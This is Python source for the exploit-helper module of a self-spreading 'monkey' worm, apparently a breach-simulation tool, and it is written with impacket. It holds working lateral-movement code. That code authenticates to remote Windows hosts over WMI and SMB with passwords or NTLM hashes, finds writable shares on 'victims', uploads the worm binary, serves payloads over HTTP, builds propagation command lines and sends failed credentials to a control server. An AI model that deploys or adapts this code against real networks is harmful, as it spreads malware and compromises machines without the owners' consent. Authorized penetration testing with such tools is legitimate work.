import os import sys import socket import struct import ntpath import pprint import logging import os.path import urllib import monkeyfs from difflib import get_close_matches from network import local_ips from transport import HTTPServer from import get_free_tcp_port, get_routes from network.firewall import app as firewall from impacket.dcerpc.v5 import transport, srvs from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError from impacket.smbconnection import SMBConnection, SMB_DIALECT from impacket.smb3structs import SMB2_DIALECT_002, SMB2_DIALECT_21 from impacket.dcerpc.v5.dcomrt import DCOMConnection from impacket.dcerpc.v5.dcom import wmi from impacket.dcerpc.v5.dtypes import NULL class DceRpcException(Exception): pass __author__ = 'itamar' LOG = logging.getLogger(__name__) class AccessDeniedException(Exception): def __init__(self, host, username, password, domain): super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" % (host, domain, username, password)) class WmiTools(object): class WmiConnection(object): def __init__(self): self._dcom = None self._iWbemServices = None @property def connected(self): return self._dcom is not None def connect(self, host, username, password, domain=None, lmhash="", nthash=""): if not domain: domain = host.ip_addr dcom = DCOMConnection(host.ip_addr, username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash, oxidResolver=True) try: iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) except Exception, exc: dcom.disconnect() if "rpc_s_access_denied" == exc.message: raise AccessDeniedException(host, username, password, domain) raise iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) try: self._iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) self._dcom = dcom except: dcom.disconnect() raise finally: iWbemLevel1Login.RemRelease() def close(self): assert self.connected, "WmiConnection isn't connected" self._iWbemServices.RemRelease() self._iWbemServices = None self._dcom.disconnect() self._dcom = None @staticmethod def dcom_wrap(func): def _wrapper(*args, **kwarg): try: return func(*args, **kwarg) finally: WmiTools.dcom_cleanup() return _wrapper @staticmethod def dcom_cleanup(): for port_map in DCOMConnection.PORTMAPS.keys(): del DCOMConnection.PORTMAPS[port_map] for oid_set in DCOMConnection.OID_SET.keys(): del DCOMConnection.OID_SET[port_map] DCOMConnection.OID_SET = {} DCOMConnection.PORTMAPS = {} if DCOMConnection.PINGTIMER: DCOMConnection.PINGTIMER.cancel() DCOMConnection.PINGTIMER.join() DCOMConnection.PINGTIMER = None @staticmethod def get_object(wmi_connection, object_name): assert isinstance(wmi_connection, WmiTools.WmiConnection) assert wmi_connection.connected, "WmiConnection isn't connected" return wmi_connection._iWbemServices.GetObject(object_name)[0] @staticmethod def list_object(wmi_connection, object_name, fields=None, where=None): assert isinstance(wmi_connection, WmiTools.WmiConnection) assert wmi_connection.connected, "WmiConnection isn't connected" if fields: fields_query = ",".join(fields) else: fields_query = "*" wql_query = "SELECT %s FROM %s" % (fields_query, object_name) if where: wql_query += " WHERE %s" % (where,) LOG.debug("Execution WQL query: %r", wql_query) iEnumWbemClassObject = wmi_connection._iWbemServices.ExecQuery(wql_query) query = [] try: while True: try: next_item = iEnumWbemClassObject.Next(0xffffffff, 1)[0] record = next_item.getProperties() if not fields: fields = record.keys() query_record = {} for key in fields: query_record[key] = record[key]['value'] query.append(query_record) except DCERPCSessionError, exc: if 1 == exc.error_code: break raise finally: iEnumWbemClassObject.RemRelease() return query class SmbTools(object): @staticmethod def copy_file(host, username, password, src_path, dst_path, timeout=60): assert monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,) config = __import__('config').WormConfiguration src_file_size = monkeyfs.getsize(src_path) smb, dialect = SmbTools.new_smb_connection(host, username, password, timeout) if not smb: return None # skip guest users if smb.isGuestSession() > 0: LOG.debug("Connection to %r with user %s and password '%s' granted guest privileges", host, username, password) try: smb.logoff() except: pass return None try: resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102) except Exception, exc: LOG.debug("Error requesting server info from %r over SMB: %s", host, exc) return None info = {'major_version': resp['InfoStruct']['ServerInfo102']['sv102_version_major'], 'minor_version': resp['InfoStruct']['ServerInfo102']['sv102_version_minor'], 'server_name': resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "), 'server_comment': resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "), 'server_user_path': resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "), 'simultaneous_users': resp['InfoStruct']['ServerInfo102']['sv102_users']} LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info)) try: resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2) except Exception, exc: LOG.debug("Error enumerating server shares from %r over SMB: %s", host, exc) return None resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer'] high_priority_shares = () low_priority_shares = () file_name = ntpath.split(dst_path)[-1] for i in range(len(resp)): share_name = resp[i]['shi2_netname'].strip("\0 ") share_path = resp[i]['shi2_path'].strip("\0 ") current_uses = resp[i]['shi2_current_uses'] max_uses = resp[i]['shi2_max_uses'] if current_uses >= max_uses: LOG.debug("Skipping share '%s' on victim %r because max uses is exceeded", share_name, host) continue elif not share_path: LOG.debug("Skipping share '%s' on victim %r because share path is invalid", share_name, host) continue share_info = {'share_name': share_name, 'share_path': share_path} if dst_path.lower().startswith(share_path.lower()): high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),) low_priority_shares += ((ntpath.sep + file_name, share_info),) shares = high_priority_shares + low_priority_shares file_uploaded = False for remote_path, share in shares: share_name = share['share_name'] share_path = share['share_path'] if not smb: smb, _ = SmbTools.new_smb_connection(host, username, password, timeout) if not smb: return None try: tid = smb.connectTree(share_name) except Exception, exc: LOG.debug("Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc) continue LOG.debug("Trying to copy monkey file to share '%s' [%s + %s] on victim %r", share_name, share_path, remote_path, host) remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep)) # check if file is found on destination if config.skip_exploit_if_file_exist: try: file_info = smb.listPath(share_name, remote_path) if file_info: if src_file_size == file_info[0].get_filesize(): LOG.debug("Remote monkey file is same as source, skipping copy") return remote_full_path LOG.debug("Remote monkey file is found but different, moving along with attack") except: pass # file isn't found on remote victim, moving on try: with, 'rb') as source_file: # make sure of the timeout smb.setTimeout(timeout) smb.putFile(share_name, remote_path, file_uploaded = True"Copied monkey file '%s' to remote share '%s' [%s] on victim %r", src_path, share_name, share_path, host) break except Exception, exc: LOG.debug("Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc) continue finally: try: smb.logoff() except: pass smb = None if not file_uploaded: LOG.debug("Couldn't find a writable share for exploiting" " victim %r with username %s and password '%s'", host, username, password) return None return remote_full_path @staticmethod def new_smb_connection(host, username, password, timeout=60): try: smb = SMBConnection(host.ip_addr, host.ip_addr, sess_port=445) except Exception, exc: LOG.debug("SMB connection to %r on port 445 failed," " trying port 139 (%s)", host, exc) try: smb = SMBConnection('*SMBSERVER', host.ip_addr, sess_port=139) except Exception, exc: LOG.debug("SMB connection to %r on port 139 failed as well (%s)", host, exc) return None, None dialect = {SMB_DIALECT: "SMBv1", SMB2_DIALECT_002: "SMBv2.0", SMB2_DIALECT_21: "SMBv2.1"}.get(smb.getDialect(), "SMBv3.0") # we know this should work because the WMI connection worked try: smb.login(username, password, domain=host.ip_addr) except Exception, exc: LOG.debug("Error while loging into %r using user %s and password '%s': %s", host, username, password, exc) return None, dialect smb.setTimeout(timeout) return smb, dialect @staticmethod def execute_rpc_call(smb, rpc_func, *args): dce = SmbTools.get_dce_bind(smb) rpc_method_wrapper = getattr(srvs, rpc_func, None) if not rpc_method_wrapper: raise ValueError("Cannot find RPC method '%s'" % (rpc_method_wrapper,)) return rpc_method_wrapper(dce, *args) @staticmethod def get_dce_bind(smb): rpctransport = transport.SMBTransport(smb.getRemoteHost(), smb.getRemoteHost(), filename=r'\srvsvc', smb_connection=smb) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(srvs.MSRPC_UUID_SRVS) return dce class HTTPTools(object): @staticmethod def create_transfer(host, src_path, local_ip=None, local_port=None): if not local_port: local_port = get_free_tcp_port() if not local_ip: local_ip = get_interface_to_target(host.ip_addr) if not firewall.listen_allowed(): return None, None httpd = HTTPServer(local_ip, local_port, src_path) httpd.daemon = True httpd.start() return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd def get_interface_to_target(dst): if sys.platform == "win32": try: import dnet intf = dnet.intf() inte = intf.get_dst(dnet.addr(dst)) return str(inte['addr']).split("/")[0] except ImportError: # dnet lib is not installed return get_close_matches(dst, local_ips())[0] else: # based on scapy implementation def atol(x): ip = socket.inet_aton(x) return struct.unpack("!I", ip)[0] routes = get_routes() dst = atol(dst) pathes = [] for d, m, gw, i, a in routes: aa = atol(a) if aa == dst: pathes.append((0xffffffffL, ("lo", a, ""))) if (dst & m) == (d & m): pathes.append((m, (i, a, gw))) if not pathes: return None pathes.sort() ret = pathes[-1][1] return ret[1] def get_target_monkey(host): from control import ControlClient import platform import sys if host.monkey_exe: return host.monkey_exe if not host.os.get('type'): return None monkey_path = ControlClient.download_monkey_exe(host) if host.os.get('machine') and monkey_path: host.monkey_exe = monkey_path if not monkey_path: if host.os.get('type') == platform.system().lower(): # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ host.os.get('machine', '').lower() == platform.machine().lower(): monkey_path = sys.executable return monkey_path def build_monkey_commandline(target_host, depth): from config import WormConfiguration, GUID cmdline = "" cmdline += " -p " + GUID if target_host.default_tunnel: cmdline += " -t " + target_host.default_tunnel if target_host.default_server: cmdline += " -s " + target_host.default_server if depth < 0: depth = 0 cmdline += " -d %d" % depth return cmdline def report_failed_login(exploiter, machine, user, password): from control import ControlClient ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__, 'exploiter': exploiter.__class__.__name__, 'user': user, 'password': password})